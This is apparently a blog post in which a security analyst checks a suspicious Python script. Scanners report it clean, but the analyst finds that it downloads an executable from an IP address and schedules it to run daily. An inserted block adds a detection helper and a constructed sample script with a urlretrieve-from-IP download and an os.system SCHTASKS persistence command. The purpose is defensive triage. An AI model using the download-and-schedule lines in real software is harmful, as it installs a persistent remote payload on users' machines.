Is this Python Script Malicious or Not?

9jarookie
3 min read · Jul 17, 2022


Our co-worker Helena has just reached out to us saying she got this Python file online, and it claims to fix a problem she has been having with her tasks. She wants us to take a look at this file and confirm whether it's good for use or not.

As the security analyst on the team, it's our task to determine if this Python file is good for use or not.

Let's INVESTIGATE!!!

So this Python file is called “Sorted Algorithm.py” and has the SHA256 hash:

255392992bf103d218466399d670300453a69f24398b02f316a74826c1f95a82

Using this hash as a guide, we run a search across online malware scanners such as Virus Total, Hybrid Analysis, Any.run etc.

Virus Total Results:

(Image: Virus Total)

Hybrid Analysis Result:

(Image: Hybrid Analysis)

Both Virus Total and Hybrid Analysis have reported this Python file as clean, but should we stop here and tell Helena the Python file is good for use?

Or should we dig deeper?

How about we check the content of this Python file and see if anything is amiss before concluding that the file is clean?

Let's see what is in this Python file with Notepad, shall we?

(Screenshot of Python Script)

From the content of the Python file we see some interesting things in the script. I won't pretend that I understand what this code does in its entirety, but we do see at the bottom of the script that there is an HTTP request to an IP address calling for the download of a Windows executable, “x86_x64_setup.exe”.

Also we see the command “SCHTASKS /CREATE”. Schtasks.exe is a legitimate executable developed by Microsoft Corporation. This process is known as Manage Scheduled Tasks and it belongs to the Windows operating system. It is commonly stored in C:\Windows\System32, and here it has been called upon to create a scheduled task for this “x86_x64_setup.exe” executable to run daily at 11:00.

Hmmmmmm…..Now that’s strange?

Why is this Python script requesting an executable from an IP address and also making it persistent with the aid of a scheduled task? This is similar to what a malicious script would do.
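As an added example (not code from the post, and not the script Helena received), here is a small static triage helper that walks a Python file's AST and reports the indicators discussed above: a download URL pointing at a bare IP address, paths ending in .exe, a “SCHTASKS /CREATE” command string, and calls that spawn a process. The sample script it scans is constructed to mirror the findings, and its IP address is a documentation-range placeholder.

```python
import ast
import re

# Constructed sample mirroring what the post describes: a script that fetches a
# Windows executable from a bare IP and registers a daily scheduled task.
# 203.0.113.10 is a documentation-range placeholder, not the real address.
SAMPLE_SCRIPT = '''
import os
import urllib.request

def sorted_algorithm(items):
    return sorted(items)

urllib.request.urlretrieve("http://203.0.113.10/x86_x64_setup.exe", "x86_x64_setup.exe")
os.system("SCHTASKS /CREATE /SC DAILY /TN Updater /TR x86_x64_setup.exe /ST 11:00")
'''

# Indicators the post walks through: a URL to a bare IPv4 address, a path that
# ends in .exe, and a schtasks /CREATE command line.
IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}\b", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"\bschtasks\b.*?/create\b", re.IGNORECASE)
# Call names that hand a string to a shell or spawn a child process.
EXEC_CALLS = {"system", "popen", "Popen", "run", "call", "check_call", "check_output"}


def triage(source: str) -> list[tuple[str, str]]:
    """Statically walk Python source and return (indicator, evidence) pairs."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # Every string literal is inspected, regardless of where it appears.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
            if IP_URL.search(text):
                findings.append(("ip_url", text))
            if text.lower().endswith(".exe"):
                findings.append(("exe_path", text))
            if SCHTASKS_CREATE.search(text):
                findings.append(("schtasks_create", text))
        # Calls such as os.system(...) or subprocess.run(...).
        elif isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if name in EXEC_CALLS:
                findings.append(("exec_call", ast.unparse(func)))
    return findings


if __name__ == "__main__":
    for kind, evidence in triage(SAMPLE_SCRIPT):
        print(f"{kind:16} {evidence}")
```

Running it against the constructed sample lists the IP download, the .exe paths, the scheduled-task command and the os.system call; a harmless sorting function alone yields no findings.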

Let's check the reputation of this IP address nonetheless:

Virus Total IP Result:

(image: Virus Total)

Any.run (Online Sandbox for Dynamic Analysis):

(image: Any Run Result)

Cisco Talos Intelligence Result:

(image: Talosintelligence.com)

From the above IP reputation searches, 4 malware engines on Virus Total flagged this IP as malicious, but our searches on Any.run and Cisco Talos Intelligence came out clean.

In summary

We have seen that this Python file does not trigger on any of our antivirus engine searches at first. However, when we parse through the script we see it makes an outbound connection to an IP address with a fairly bad reputation to download an executable that is scheduled to run daily at 11:00.

At this juncture, we pass a vote of no confidence in our analysis note to Helena, as this mimics what typical malware does to maintain persistence.

#Always dig a little deeper
